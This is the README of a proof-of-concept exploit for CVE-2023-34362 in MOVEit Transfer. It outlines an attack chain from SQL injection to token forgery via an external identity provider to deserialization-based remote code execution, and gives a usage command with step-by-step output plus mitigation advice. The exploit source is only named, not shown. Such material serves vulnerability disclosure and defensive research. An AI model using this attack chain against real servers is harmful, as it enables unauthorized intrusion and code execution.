POC for CVE-2023-34362 affecting MOVEit Transfer# CVE-2023-34362
POC for CVE-2023-34362 affecting MOVEit Transfer
## Technical Analysis
A technical root cause analysis of the vulnerability can be found on the blog:
## Summary
- This POC abuses an SQL injection to obtain a sysadmin API access token and then uses that access to abuse a deserialization call to obtain remote code execution.
- This POC needs to reach out to an Identity Provider endpoint that hosts proper RS256 certificates used to forge arbitrary user tokens - by default this POC uses our IDP endpoint hosted in AWS.
- The exploit will default write a file to C:\Windows\Temp\message.txt. Alternative payloads can be generated by using the ysoserial.net project.
## Usage
```plaintext
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
```
## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
[4.0K] /data/pocs/3fc35e4847fa3c6ba49533e5cf0a4d0ffb5040f2
├── [1.9K] cert.crt
├── [ 14K] CVE-2023-34362.py
├── [3.2K] key.pem
├── [ 800] key.pub
├── [1.0K] LICENSE
├── [3.2K] provider_file.txt
└── [1.6K] README.md
0 directories, 7 files